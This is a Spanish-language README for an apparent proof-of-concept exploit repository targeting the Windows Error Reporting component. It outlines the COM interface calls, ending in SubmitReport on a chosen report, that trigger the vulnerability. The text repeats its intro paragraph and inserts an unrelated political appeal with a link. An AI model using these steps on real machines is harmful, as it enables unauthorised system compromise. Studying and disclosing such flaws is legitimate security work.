
Este repositorio contiene un exploit de prueba de concepto escrito en C++ que demuestra la explotación de una vulnerabilidad que afecta al componente Windows Error Reporting (WER).
Exigimos el regreso seguro de todos los ciudadanos que han sido tomados como rehenes por el grupo terrorista Hamás. No descansaremos hasta que cada rehén sea liberado y regrese a casa sano y salvo. Puedes ayudar a traerlos de vuelta a casa. https://stories.bringthemhomenow.net/
Este repositorio contiene un exploit de prueba de concepto escrito en C++ que demuestra la explotación de una vulnerabilidad que afecta al componente Informe de errores de Windows (WER). El exploit muestra los pasos necesarios para desencadenar la vulnerabilidad y está destinado únicamente a fines educativos. Cualquier uso malicioso o no ético de este código está estrictamente desaconsejado.
Initialize COM by calling CoInitialize(NULL).
Create COM interfaces to interact with WER:
Create an instance of CLSID_ERCLuaSupport to obtain an IErcLuaSupport interface.
Use IErcLuaSupport to create an IWerStoreFactory instance.
Create an IWerStore instance using IWerStoreFactory.
Start the report enumeration process by calling pIWerStore->EnumerateStart().
Load a report using pIWerStore->LoadReport function. Replace "ReportName" with the actual report name you want to exploit.
Submit the loaded report to trigger the vulnerability by calling pIWerReport->SubmitReport().
Release the COM interfaces and clean up the resources:
pIWerReport->Release()
pIWerStore->Release()
pIWerStoreFactory->Release()
pIErcLuaSupport->Release()
Uninitialize COM by calling CoUninitialize().
Este exploit se proporciona únicamente con fines educativos. No está destinado a un uso malicioso o no ético. Los autores y colaboradores del repositorio no son responsables de ningún uso indebido ni de los daños causados por el uso de este código. Licencia Este código se publica bajo la Licencia MIT. Por favor, utiliza este código de forma responsable y cumple con los estándares éticos al trabajar con vulnerabilidades y exploits de seguridad.